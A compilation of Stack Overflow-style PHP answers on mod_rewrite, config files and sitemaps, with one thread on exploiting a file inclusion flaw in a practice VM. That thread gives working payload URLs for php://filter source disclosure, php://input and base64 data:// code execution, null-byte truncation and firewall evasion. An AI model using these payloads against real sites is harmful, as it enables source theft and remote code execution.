Assuming you have only the URL to a file (hosted on the same server as the app) that has been rewritten via mod_rewrite rules.
How would you read the contents of that file with PHP without having direct access to a .htaccess file or the rewrite rules used to building the original URL?
I'm trying to extract all the script tags that have the "src" attribute set, retrieve the contents of the target file, merge all of them into one big javascript file, minify it and then serve that one instead.
The problem is that reading all of the files via file_get_contents seems to slow the page down, so I was looking at alternatives and if I would be able to somehow read the files directly from the file system without having to generate other requests in the background, but to do this, I would have to find out the path to the files and some are accessed via URLs that have been rewritten.
You can't include it as if it were the original PHP, only get the results of the PHP's execution itself.
If you've got fopen wrappers on, this is as easy as using require, include or file_get_contents on the rewritten URL. Otherwise you have fsockopen and curl as options to create the HTTP request for the result.
As you cannot say how the request would be handled, the only possible solution is to send a HTTP request to that server. But that would only get you the output of that file/script.
PHP lays behind apache and has file access on file-system level using fopen-like or include-like etc... functions. Rewrite module won't work for this access, because these functions use OS file access routines but not apache.
There's no way to do this, but implementing in php-script the same rules of URL-rewriting as you have in .htaccess, because apache-rewriting and php file access know nothing about each other and are on comletely different layers of web-application.
AFTER EDIT: The only way - imlement your rewrite rules in php script and use file system php access after parsing the URLs via php (not rewrite module).
Related
So i was browsing through the web and found a video, upon inspecting the video source i found out that it had a get variable in the url, it looked like this:
http://www.blablabla.com/stream/2017/09/2a5ef169.mp4?expires=1302948611&token=1290239327
this part got my interest:
2a5ef169.mp4?expires=1302948611&token=1290239327
Its a MP4 file but accepts get variables. if those variables do not match a certain function i am not able to view the video so i think its linked to a php file.
I do know how GET and POST works in PHP but how do i apply this to a MP4 file or any other file.
Just because the extension ends in mp4, it doesn't mean "there is an mp4 file somewhere".
consider .htaccess can change extensions and using mod_rewrite or similar, people can redirect a given "clean" url to any php program.
So there may be a php interpreter behind the mp4 requests, and apache may have a modified httpd.conf or .htaccess file which routes /(.*).mp4 requests into a serve_video.php program (or whatever the name is).
This means in general, extensions don't mean anything.
by using HTTP header()s, the server might be responding dynamically (example: https://gist.github.com/ranacseruet/9826293) to each request (potentially in order to log the video's view count or something similar, like checking the HTTP REFERER in order to avoid hotlinking)
Hope that helps!
Can I use include (or something similar) to get functions (or something else) from an online file?
Something like this:
include 'http://stackoverflow.com/questions/ask.php';
Simple Answer: No
Elaborating:
If you use http or https inside your file path, you are literally telling your code to include a file that is on the internet and to use the HTTP / HTTPS protocol in that process.
As you probably know, php code is executed on the server and is never displayed to users online, but rather the output of the php is displayed.
For that reason, you won't be able to gain access to your php functions while being a user from online (because that is how you will be perceived with the previous method).
What you should do is either use relative paths or absolute paths to include php scripts with functions on the same server. Here is some php documentation if you want to read a bit more on how to format the path: PHP DOC
I would like to keep all config options for a webapp in one file. (pathes, passwords, options which are read by php, sass (during compilation), maybe grunt,..)
I like the JSON format since its very clear and almost anything can parse json. But by default .json files can be downloaded.
Can I safely prevent that by giving the file a .json.php extension?
What are the drawbacks? Better Approaches?
To prevent the file being downloaded, generally the way to go is to store it in a directory that is not served by the web server. I don't know what setup you're in, but assuming an Apache setup, if for example your .php files are served from a directory /home/user/htdocs, you could create a directory /home/user/config, ensure that it is readable by the webserver, and store the .json files there.
Another approach, again assuming Apache, would be to create an .htaccess file containing the following (inspired by this answer):
RedirectMatch 404 \.json$
This would not only prevent downloading any and all .json files in the directory, but hide their very existence.
It might just be possible to do it the way you suggested, by storing the file with a .json.php extension, although this would not be a recommended approach. For this to work, the file has to be valid PHP but it must obviously be valid JSON as well and we are hampered somewhat by the fact that JSON does not allow comments. Something like the following would stop the PHP interpreter soon after the start of the file, before spilling your secrets:
{
"<?php exit('Access denied'); ?>": null,
"password": "secret"
}
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named setupreset.php which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).
This is the code of index.php, for reference:
<?php
include ("includes/header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") {
include("home.html");
} else { include ($page . '.php'); }
include ("includes/footer.php");
?>
The main goal is to list the contents of the setupreset PHP file, or download it somehow. If I navigate to this file: http://10.211.55.5/index.php?page=setupreset, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.
Now, the website uses PHP includes, so URLs look like this: http://10.211.55.5/index.php?page=products. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php but allow_url_include is off and cannot be changed, so this won't work (I tried this). However, allow_url_fopen is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of setupreset.php using this kind of exploit?
If allow_url_include is off, you can't execute remote code. But you can find other pages, for example a content management dashboard, to upload your code as "image", then find the actual path and include it.
And, there are still ways to exploit.
Let's look inside your code. You may notice that it automatically add an extension .php at the end of path. So you should remove php in GET param. But what if the file you want to include does not have PHP extension? Then use %00 to terminate string, such as
http://localhost/include.php?page=../uploads/your_uploaded_fake_image.jpg%00
There's a special protocol in PHP, powerful and dangerous. It's php://.
You can check out the offcial manual for detailed information, and here I'll show you some cases to make a file inclusion vulnerability become source disclosure and even remote code execution vulnerabilities.
Before your test, I suggest you use Firefox with HackBar plugin. It's a powerful penetration testing suite.
Source disclosure
This feature doesn't need url inclusion allowed.
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. (Reference)
Then you can see the source secret.inc.php in the same directory via following request.
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
File content will be encoded in base64, so it does support binary file.
It's powerful to get sensitive information, such as database passwords or a encryption key! If privilege is not proper configurated, it can even jump out of cage and extract data from files in outter directories, like /etc/passwd!
Remote code execution
Actually you can't exploit this way, because allow_url_include is Off in this case.
But I must point it out because it's magical!
It's completly different from local include. It doesn't need to upload any file to a remote server or so. All you need is one single request.
php://input can access the raw HTTP request body, so what does include("php://input") do? Just visit http://localhost/include.php?page=php://input, with valid PHP code in request body, then you can execute any (allowed) function in remote server!
Don't forget the %00 to drop .php tail.
Besides, PHP supports data:// URL scheme. You can directly put code in GET param! The following test doesn't need any special tool, just a normal browser can execute an attack.
http://localhost/include.php?page=data:text/plaintext,<?php phpinfo();?>
Some Web Application Firewalls may detect suspected string in URL and block evil request, they won't leave the phpinfo alone. Is there a way to encrypt? Of course. data:// URL supports at least base64 encoding...
http://localhost/include.php?page=data:text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==
And you will get familiar phpinfo once again!
Note
The null byte trick (%00) does not work anymore for PHP >= 5.3.4: http://blog.benjaminwalters.net/?p=22139
Use a directory traversal and end your input string with a %00 NUL meta character (as mentioned on wikipedia).
http://example.com/index.php?page=setuppreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
It is not. The php file is getting executed because you call include, if you called readfile, file_get_contents or similar you could see the contents of the php file.
Here's the problem I'm trying to solve: I have a dynamic php-driven website that is constantly being updated with new content, and I want my XML sitemap to stay up to date automatically. Two options I see:
Write a php script that queries my database to get all my content and outputs to http://mysite.com/sitemap.xml, execute the script regularly using a cron job.
Simply create my sitemap as a php file (sitemap.php), query the db and write directly to that file, and use the htaccess rewrite rule RewriteRule ^sitemap.xml$ sitemap.php so that whenever someone requests sitemap.xml they're directed to the php file and get a fresh sitemap file.
I'd much rather go with option #2 since it's simpler and doesn't require setting up a cron, but I'm wondering if Googlebot will not recognize sitemap.xml as valid if it's actually a php file?
Does anyone know if option #2 would work, and if not whether there's some better way to automatically create an up-to-date sitemap.xml file? I'm really surprised how much trouble I've had with this... Thanks!
Just make sure your script generates the appropriate Content-Type header. You can do so with header().
Google will only get the headers and the body of the response. If your php script returns the same headers and the same body as your webserver would return, then there is technically no difference between the PHP script response or the XML file response by your server. Use curl -i http://example.com/ to inspect the response headers of a request if you would like to test that on your own.
So you can safely do this, that's for what mod_rewrite has been designed (next to the many other things).